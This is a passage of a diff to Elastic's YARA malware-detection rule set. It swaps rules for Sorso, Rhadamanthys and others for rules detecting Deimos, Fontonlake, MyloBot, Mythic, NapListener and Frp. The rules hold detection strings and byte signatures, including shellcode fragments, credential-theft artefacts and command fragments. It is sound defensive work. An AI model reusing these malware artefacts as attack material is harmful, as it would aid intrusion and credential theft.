"d2c0ccceed8a76d13c8b388e5c3b560f23ecff2b1b9c90d18e5e0d0bbdc91364" + fingerprint = "2d95dbe502421d862eee33ba819b41cb39cf77a44289f4de4a506cad22f3fddb" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 6E 89 E3 50 54 53 50 B0 3B CD 80 31 C0 B0 01 CD } + $a1 = "MozillaBrowserList" + $a2 = "EnableScreenLogger" + $a3 = "VaultGetItem_WIN7" + $a4 = "PublicIpAddressGrab" + $a5 = "EnableTorPanel" + $a6 = "get_GuidMasterKey" condition: - all of them + 4 of them } -rule ELASTIC_Linux_Exploit_Sorso_91A4D487 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Deimos_F53Aee03 : FILE MEMORY { meta: - description = "Detects Linux Exploit Sorso (Linux.Exploit.Sorso)" + description = "Detects Windows Trojan Deimos (Windows.Trojan.Deimos)" author = "Elastic Security" - id = "91a4d487-cbb6-4805-a4fc-5f4ff3b0e22b" - date = "2021-04-06" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Sorso.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0f0a7b45fb91bc18264d901c20539dd32bc03fa5b7d839a0ef5012fb0d895cd" - logic_hash = "bb58c78ae3cc730aa1ef32974f65adabd63972ef181696aeb79954f904f2f405" + id = "f53aee03-74c3-4b40-8ae4-4f1bf35f88c8" + date = "2021-09-18" + modified = "2022-01-13" + reference = "https://www.elastic.co/security-labs/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Deimos.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2c1941847f660a99bbc6de16b00e563f70d900f9dbc40c6734871993961d3d3e" + logic_hash = "07675844a8790f8485b6545e7466cdef8ac4f92dec4cd8289aeaad2a0a448691" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4965d806fa46b74023791ca17a90031753fbbe6094d25868e8d93e720f61d4c0" + fingerprint = "12a6d7f9e4f9a937bf1416443dd0d5ee556ac1f67d2b56ad35f9eac2ee6aac74" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 80 31 C0 43 53 56 50 B0 5A CD 80 31 C0 50 68 2F } + $a1 = "\\APPDATA\\ROAMING" wide fullword + $a2 = "{\"action\":\"ping\",\"" wide fullword + $a3 = "Deimos" ascii fullword condition: - all of them + all of ($a*) } -rule ELASTIC_Linux_Exploit_Sorso_61Eae7Dd : FILE MEMORY +rule ELASTIC_Windows_Trojan_Deimos_C70677B4 : FILE MEMORY { meta: - description = "Detects Linux Exploit Sorso (Linux.Exploit.Sorso)" + description = "Detects Windows Trojan Deimos (Windows.Trojan.Deimos)" author = "Elastic Security" - id = "61eae7dd-3335-4a50-b70b-c7c5657fc540" - date = "2021-04-06" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Sorso.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0f0a7b45fb91bc18264d901c20539dd32bc03fa5b7d839a0ef5012fb0d895cd" - logic_hash = "a8bc8a2c8405b80b160ad21898003781405a762c0e627f13b34e9362e0aa51a1" + id = "c70677b4-f5ba-440b-ba31-31e80caee2fe" + date = "2021-09-18" + modified = "2022-01-13" + reference = "https://www.elastic.co/security-labs/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Deimos.yar#L24-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2c1941847f660a99bbc6de16b00e563f70d900f9dbc40c6734871993961d3d3e" + logic_hash = "c969221f025b114b9d5738d43b6021ab9481dbc6b35eb129ea4f806160b1adc3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8ada74a60e30a26f7789bfdf00b3373843f39dc7d71bd6e1b603a7a41b5a63e9" + fingerprint = "ffe0dec3585da9cbb9f8a0fac1bb6fd43d5d6e20a6175aaa889ae13ef2ed101f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 69 89 E3 50 53 89 E1 B0 0B CD 80 31 C0 B0 01 CD } + $a1 = { 00 57 00 58 00 59 00 5A 00 5F 00 00 17 75 00 73 00 65 00 72 00 } + $a2 = { 0C 08 16 1F 68 9D 08 17 1F 77 9D 08 18 1F 69 9D 08 19 1F 64 9D } condition: - all of them + 1 of ($a*) } -rule ELASTIC_Windows_Trojan_Rhadamanthys_21B60705 : FILE MEMORY +rule ELASTIC_Linux_Backdoor_Fontonlake_Fe916A45 : FILE MEMORY { meta: - description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" + description = "Detects Linux Backdoor Fontonlake (Linux.Backdoor.Fontonlake)" author = "Elastic Security" - id = "21b60705-9696-43ba-a820-d8ab9c34cca2" - date = "2023-03-19" - modified = "2023-04-23" + id = "fe916a45-75cc-40e4-94ad-6ac0f5d815b9" + date = "2021-10-12" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Rhadamanthys.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ba97c51ba503fa4bdcfd5580c75436bc88794b4ae883afa1d92bb0b2a0f5efe" - logic_hash = "ef3f60689d72553111b42b27e0a1a0316288ae07fbfaf159eea8c76380d528fa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Backdoor_Fontonlake.yar#L1-L29" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8a0a9740cf928b3bd1157a9044c6aced0dfeef3aa25e9ff9c93e113cbc1117ee" + logic_hash = "590b28264345ea0bdbd53791f422cb4f1fad143df2b790824fc182356a568d7d" score = 75 - quality = 50 + quality = 48 tags = "FILE, MEMORY" - fingerprint = "8a756bf4a8c9402072531aca2c29a382881c1808a790432ccac2240b35c09383" + fingerprint = "85f16dd4a127737501863ccba006a444d899c6edc6ab03af5dddef2d39edc483" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "Session\\%u\\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}" wide fullword - $a2 = "MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}" wide fullword - $a3 = " \"%s\",Options_RunDLL %s" wide fullword - $a4 = "%%TEMP%%\\vcredist_%05x.dll" wide fullword - $a5 = "%%APPDATA%%\\vcredist_%05x.dll" wide fullword - $a6 = "TEQUILABOOMBOOM" wide fullword - $a7 = "%Systemroot%\\system32\\rundll32.exe" wide fullword + $a1 = ".cmd.Upload_Passwd.PasswordInfo" fullword + $a2 = "Upload_Passwd" fullword + $a3 = "upload_file_beg" fullword + $a4 = "upload_file_ing" fullword + $a5 = "upload_file_end" fullword + $a6 = "modify_file_attr" fullword + $a7 = "modify_file_time" fullword + $a8 = "import platform;print(platform.linux_distribution()[0]);print(platform.linux_distribution()[1]);print(platform.release())" fullword + $a9 = "inject.so" fullword + $a10 = "rm -f /tmp/%s" fullword + $a11 = "/proc/.dot3" fullword condition: 4 of them } -rule ELASTIC_Windows_Trojan_Rhadamanthys_1Da1C2C2 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Mylobot_A895174A : FILE MEMORY { meta: - description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" + description = "Detects Windows Trojan Mylobot (Windows.Trojan.MyloBot)" author = "Elastic Security" - id = "1da1c2c2-90ea-4f76-aa38-666934c0aa68" - date = "2023-03-28" - modified = "2023-04-23" + id = "a895174a-0395-4ccb-b681-e8111a817a5c" + date = "2024-05-15" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Rhadamanthys.yar#L27-L52" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9bfc4fed7afc79a167cac173bf3602f9d1f90595d4e41dab68ff54973f2cedc1" - logic_hash = "bf5d45fe79dacfc6aee5cfd788ec6ce77e99e55d5a6d294da57c126bedf75ee9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_MyloBot.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "33831d9ad64d0f52f507f08ef81607aafa6ced58a189969af6cf57c659c982d2" + logic_hash = "16f2d8eeb6c85944030a33bd250e4e8b98985a6c877a0ec3ad5a6037e7c00159" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "7b3830373b773be03dc6d0f030595f625a2ef0b6a83312a5b0a958c0d2e5b1c0" + fingerprint = "dfa1e47260c0e07fea3b2b61157de71f412807b9eec19b14082da7d6a95d6099" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -58092,222 +58989,249 @@ rule ELASTIC_Windows_Trojan_Rhadamanthys_1Da1C2C2 : FILE MEMORY os = "windows" strings: - $a1 = "%s\\tdata\\key_datas" wide fullword - $a2 = "\\config\\loginusers.vdf" wide fullword - $a3 = "/bin/KeePassHax.dll" ascii fullword - $a4 = "%%APPDATA%%\\ns%04x.dll" wide fullword - $a5 = "\\\\.\\pipe\\{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}" wide fullword - $a6 = " /s /n /i:\"%s,%u,%u,%u\" \"%s\"" wide fullword - $a7 = "strbuf(%lx) reallocs: %d, length: %d, size: %d" ascii fullword - $a8 = "SOFTWARE\\FTPWare\\CoreFTP\\Sites\\%s" wide fullword + $a1 = "%s\\%s.lnk" wide fullword + $a2 = "%s\\%s.exe" wide fullword + $a3 = "%s\\%s\\%s.exe" wide fullword + $a4 = "HTTP/1.0 502" ascii fullword + $a5 = "/c \"%ws '%ws%s'\"" ascii fullword + $a6 = ">> %ws %ws %ws" ascii fullword + $a7 = "%s\\DefaultIcon" ascii fullword condition: - 6 of them + all of them } -rule ELASTIC_Windows_Trojan_Rhadamanthys_Ae00F48C : FILE MEMORY +rule ELASTIC_Multi_Trojan_Mythic_4Beb7E17 : FILE MEMORY { meta: - description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" + description = "Detects Multi Trojan Mythic (Multi.Trojan.Mythic)" author = "Elastic Security" - id = "ae00f48c-f420-4a23-aae7-6f2bde29593c" - date = "2023-05-05" - modified = "2023-06-13" + id = "4beb7e17-34c2-4f5c-a668-e54512175f53" + date = "2023-08-01" + modified = "2023-09-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Rhadamanthys.yar#L54-L74" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "56b5ff5132ec1c5836223ced287d51a9ecee8d2b081f449245e136b1262a8714" - logic_hash = "423b68717a7aead3c871e7fc744e35dad1cfd7727bfba2bdaec69fb782540380" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Trojan_Mythic.yar#L1-L28" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "7b3b7bae1763f3c73df206f97065920fa55b973d22c967acb3d26ac8e89e60c7" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "8e3d13998a8e512aabf15534d61c06e0c6c51a4e8e46456538c654694310e670" + fingerprint = "0b25c5b069cec31e9af31b7822ea19b813fe1882dfaa584661ff14414ae41df5" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $a1 = { 75 30 8B 51 28 8B 41 2C 85 DB 74 03 89 53 28 85 D2 74 15 39 } - $a2 = { 3C 65 74 50 3C 68 74 2A 3C 6E } - $a3 = { 49 74 39 49 74 2D 49 49 74 29 49 49 74 25 49 49 74 } + $a1 = "task_id" + $a2 = "post_response" + $a3 = "c2_profile" + $a4 = "get_tasking" + $a5 = "tasking_size" + $a6 = "get_delegate_tasks" + $a7 = "total_chunks" + $a8 = "is_screenshot" + $a9 = "file_browser" + $a10 = "is_file" + $a11 = "access_time" condition: - all of them + 7 of them } -rule ELASTIC_Windows_Trojan_Rhadamanthys_Cf5Dd2E2 : FILE MEMORY +rule ELASTIC_Multi_Trojan_Mythic_E0Ea7Ef9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" + description = "Detects Multi Trojan Mythic (Multi.Trojan.Mythic)" author = "Elastic Security" - id = "cf5dd2e2-a505-4927-8653-3c9addd3ac90" - date = "2024-04-03" - modified = "2024-05-08" + id = "e0ea7ef9-452c-404c-95ba-4057ec40ef4b" + date = "2024-05-23" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Rhadamanthys.yar#L76-L97" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "39ccc224c2c6d89d0bce3d9e2c677465cbc7524f2d2aa903f79ad26b340dec3d" - logic_hash = "039d6de0d072be6717ba3eb90735d7b4898d3bbac83db4feb75efcdbca8fd98b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Trojan_Mythic.yar#L30-L61" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e091d63c8e8b0a32a3d25cffdf02419fdbec714f31e4061bafd80b1971831c5f" + logic_hash = "237307d85fe7886eb2cf351a9f7872e3e5551f05535f0b6a966a960d204aee90" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3b2bdfd45a11649deb3430044c7b707aebcf74a3745398e3db09a7465fa62a6c" + fingerprint = "57afe989db139314a7505a2ccc01367cdd13132318dc19b57d4b79f65bfe982c" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $a1 = { 33 D2 49 8B C4 49 83 C4 57 48 F7 F7 41 8A C2 46 0F B6 04 1A 33 D2 42 8D 4C 05 00 C1 E9 03 F6 E9 8A C8 49 8B C0 41 C0 E8 05 } - $a2 = { 8A 04 19 32 03 88 04 1A 48 83 C3 01 48 83 EF 01 } - $a3 = { 4C 01 27 48 8B 0F 48 8B 47 10 C6 04 01 00 48 83 07 01 48 8B 0F 48 8B 47 10 } - $a4 = { 69 F6 93 01 00 01 0F B6 C0 48 83 C1 01 33 F0 8A 01 84 C0 } + $profile1 = "src/profiles/mod.rs" + $profile2 = "src/profiles/http.rs" + $rs_ssh1 = "src/ssh/spawn.rs" + $rs_ssh2 = "src/ssh/agent.rs" + $rs_ssh3 = "src/ssh/cat.rs" + $rs_ssh4 = "src/ssh/upload.rs" + $rs_ssh5 = "src/ssh/exec.rs" + $rs_ssh6 = "src/ssh/download.rs" + $rs_ssh7 = "src/ssh/rm.rs" + $rs_ssh8 = "src/ssh/ls.rs" + $rs_misc1 = "src/utils/linux.rs" + $rs_misc2 = "src/portscan.rs" + $rs_misc3 = "src/payloadvars.rs" + $rs_misc4 = "src/getprivs.rs" condition: - 2 of them + all of ($profile*) and 8 of ($rs*) } -rule ELASTIC_Windows_Trojan_Rhadamanthys_C4760266 : FILE MEMORY +rule ELASTIC_Multi_Trojan_Mythic_528324B4 : FILE MEMORY { meta: - description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" + description = "Detects Multi Trojan Mythic (Multi.Trojan.Mythic)" author = "Elastic Security" - id = "c4760266-bbff-4428-a7a5-bca7513c7993" - date = "2024-06-05" + id = "528324b4-822d-4e48-b4ab-f5b234348773" + date = "2024-05-23" modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Rhadamanthys.yar#L99-L117" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "05074675b07feb8e7556c5af449f5e677e0fabfb09b135971afbb11743bf3165" - logic_hash = "b8c1c56681aac4e1b1741dfa3ea929677214873b6f1795423a80742f699249de" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Trojan_Mythic.yar#L63-L89" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2cd883eab722a5eacbca7fa82e0eebb5f6c30cffa955abcb1ab8cf169af97202" + logic_hash = "8c85d086b30030a24fba9f519aed3fdf3c821932d71ceaecfe354fe07cd1d631" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "53a04d385ef3a59b76500effaf740cd0e7d825ea5515f871097d82899b0cfc44" + fingerprint = "5188aa792c02acf7a6346f395389390ae187cb08083bfca27283a4f4dd4d7206" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $a = { 55 8B EC 83 EC 14 83 7D 08 00 53 8B D8 74 50 56 57 8B 7D 0C 6A 10 2B FB 5E 56 8D 45 EC 53 50 ?? ?? ?? ?? ?? 83 C4 0C 90 8B 4D 10 8B C3 2B CB 89 75 FC 8A 14 07 32 10 88 14 01 40 FF 4D FC 75 F2 } + $import1 = "Autofac" + $import2 = "Obfuscar" + $import3 = "Agent.Profiles.Http" + $import4 = "Agent.Managers.Linux" + $import5 = "Agent.Managers.Reflection" + $athena1 = "Athena.Commands.dll" + $athena2 = "Athena.Handler.Linux.dll" + $athena3 = "Athena.dll" + $athena4 = "Athena.Profiles.HTTP.dll" condition: - all of them + (2 of ($import*)) or (2 of ($athena*)) } -rule ELASTIC_Windows_Hacktool_Processhacker_3D01069E : FILE +rule ELASTIC_Linux_Trojan_Adlibrary_2E908E5F : FILE MEMORY { meta: - description = "Detects Windows Hacktool Processhacker (Windows.Hacktool.ProcessHacker)" + description = "Detects Linux Trojan Adlibrary (Linux.Trojan.Adlibrary)" author = "Elastic Security" - id = "3d01069e-7afb-4da0-b7ac-23f90db26495" - date = "2022-03-30" - modified = "2022-03-30" + id = "2e908e5f-f79e-491f-8959-86b7cffd35c0" + date = "2022-08-23" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_ProcessHacker.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4" - logic_hash = "bcba74aa20b62329c48060bfebaf49ab12f89f9ec3a09fc0c0cb702de5e2b940" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Adlibrary.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "acb22b88ecfb31664dc07b2cb3490b78d949cd35a67f3fdcd65b1a4335f728f1" + logic_hash = "0d0df636876adf0268b7a409bfc9d8bfad298793d11297596ef91aeba86889da" score = 75 quality = 75 - tags = "FILE" - fingerprint = "5d6a0835ac6c0548292ff11741428d7b2f4421ead6d9e2ca35379cbceb6ee68c" + tags = "FILE, MEMORY" + fingerprint = "27ea79ad607f0dbd3d7892e27be9c142b0ac3a2b56f952f58663ff1fe68d6c88" severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $original_file_name = "OriginalFilename\x00kprocesshacker.sys" wide fullword + $a1 = { 32 04 39 83 C7 01 0F BE C0 89 04 24 E8 ?? ?? ?? ?? 3B 7C 24 ?? B8 00 00 00 00 0F 44 F8 83 C5 01 81 FD } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name + all of them } -rule ELASTIC_Windows_Hacktool_Sharphound_5Adf9D6D : FILE MEMORY +rule ELASTIC_Linux_Proxy_Frp_4213778F : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharphound (Windows.Hacktool.SharpHound)" + description = "Detects Linux Proxy Frp (Linux.Proxy.Frp)" author = "Elastic Security" - id = "5adf9d6d-b6db-43ea-95bd-e9747b82a36d" - date = "2022-10-20" - modified = "2022-11-24" + id = "4213778f-d05e-4af8-9650-2d813d5a64e5" + date = "2021-10-20" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpHound.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1f74ed6e61880d19e53cde5b0d67a0507bfda0be661860300dcb0f20ea9a45f4" - logic_hash = "2c9f38187866985109a42ffdf8940b5d195aadd3815b2de952b190d4b0b95c3c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Proxy_Frp.yar#L1-L28" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "16294086be1cc853f75e864a405f31e2da621cb9d6a59f2a71a2fca4e268b6c2" + logic_hash = "83eeb632026c38ac08357c27d971da31fbc9a0500ecf489e8332ac5862a77b85" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "53d295223e2330a973f9495a7ca625c1e9429bc5daf7dda1b84b2aaeca5ea898" + fingerprint = "70bb186a9719767a9a60786fbe10bf4cc2f04c19ea58aaaa90018ec89a9f9b84" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $guid0 = "A517A8DE-5834-411D-ABDA-2D0E1766539C" ascii wide nocase - $guid1 = "90A6822C-4336-433D-923F-F54CE66BA98F" ascii wide nocase - $print_str0 = "Initializing SharpHound at {time} on {date}" ascii wide - $print_str1 = "SharpHound completed {Number} loops! Zip file written to {Filename}" ascii wide - $print_str2 = "[-] Removed DCOM Collection" ascii wide + $s1 = "github.com/fatedier/frp/client/proxy.TcpProxy" + $s2 = "frp/cmd/frpc/sub/xtcp.go" + $s3 = "frp/client/proxy/proxy_manager.go" + $s4 = "fatedier/frp/models/config/proxy.go" + $s5 = "github.com/fatedier/frp/server/proxy" + $s6 = "frp/cmd/frps/main.go" + $p1 = "json:\"remote_port\"" + $p2 = "remote_port" + $p3 = "remote_addr" + $p4 = "range section [%s] local_port and remote_port is necessary[ERR]" condition: - $guid0 or $guid1 or all of ($print_str*) + 2 of ($s*) and 2 of ($p*) } -rule ELASTIC_Macos_Backdoor_Useragent_1A02Fc3A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Naplistener_E8F16920 : FILE MEMORY { meta: - description = "Detects Macos Backdoor Useragent (MacOS.Backdoor.Useragent)" + description = "Detects Windows Trojan Naplistener (Windows.Trojan.NapListener)" author = "Elastic Security" - id = "1a02fc3a-a394-457b-8af5-99f7f22b0a3b" - date = "2021-11-11" - modified = "2022-07-22" + id = "e8f16920-52ca-46b6-a945-1b919f975aae" + date = "2023-02-28" + modified = "2023-03-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Backdoor_Useragent.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "623f99cbe20af8b79cbfea7f485d47d3462d927153d24cac4745d7043c15619a" - logic_hash = "90debdfc24ef100952302808a2e418bca2a46be3e505add9a0ccf4c49aff5102" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_NapListener.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6e8c5bb2dfc90bca380c6f42af7458c8b8af40b7be95fab91e7c67b0dee664c4" + logic_hash = "6cb7b5051fab2b56f39b2805788b5b0838a095b41fcc623fe412b215736be5d4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "22afa14a3dc6f8053b93bf3e971d57808a9cc19e676f9ed358ba5f1db9292ba4" + fingerprint = "36689095792e7eb7fce23e7d390675a3554c8a5ba4356aaf9c2fa8986d3a0439" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $s1 = "/Library/LaunchAgents/com.UserAgent.va.plist" - $s2 = "this is not root" - $s3 = "rm -Rf " - $s4 = "/start.sh" - $s5 = ".killchecker_" + $start_routine = { 02 28 08 00 00 0A 00 00 28 03 00 00 0A 0A 14 FE 06 04 00 00 06 73 04 00 00 0A 73 05 00 00 0A 0B 16 28 06 00 00 0A 00 07 06 6F 07 00 00 0A 00 00 2A } + $main_routine = { 6F 22 00 00 0A 13 0E 11 0D 1F 24 14 16 8D 16 00 00 01 14 6F 23 00 00 0A 13 0F 11 0F 14 6F 24 00 00 0A 13 10 11 0E 11 10 18 8D 01 00 00 01 } + $start_thread = { 00 28 03 00 00 0A 0A 14 FE 06 04 00 00 06 73 04 00 00 0A 73 05 00 00 0A 0B 16 28 06 00 00 0A 00 07 06 6F 07 00 00 0A 00 2A } condition: - 4 of them + 2 of them } -rule ELASTIC_Windows_Ransomware_Helloxd_0C50F01B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Naplistener_414180A7 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Helloxd (Windows.Ransomware.Helloxd)" + description = "Detects Windows Trojan Naplistener (Windows.Trojan.NapListener)" author = "Elastic Security" - id = "0c50f01b-5f3d-4112-9930-ca1150fc12fa" - date = "2022-06-14" - modified = "2022-07-18" + id = "414180a7-ca8d-4cf8-a346-08c3e0e1ed8a" + date = "2023-02-28" + modified = "2023-03-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Helloxd.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "435781ab608ff908123d9f4758132fa45d459956755d27027a52b8c9e61f9589" - logic_hash = "71e09fa1a00fa6f3688129ee2b2a8957b84f64ef51fcba5123a6a9df80a9c7e1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_NapListener.yar#L23-L46" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6e8c5bb2dfc90bca380c6f42af7458c8b8af40b7be95fab91e7c67b0dee664c4" + logic_hash = "52d3ddebdc1a8aa4bcb902273bd2d3b4f9b51f248d25e7ae1cc260a9550111f5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "462d8c231d608e28e66d810b811f9fdf82d0b3770d21267a4375669a26bbaafd" + fingerprint = 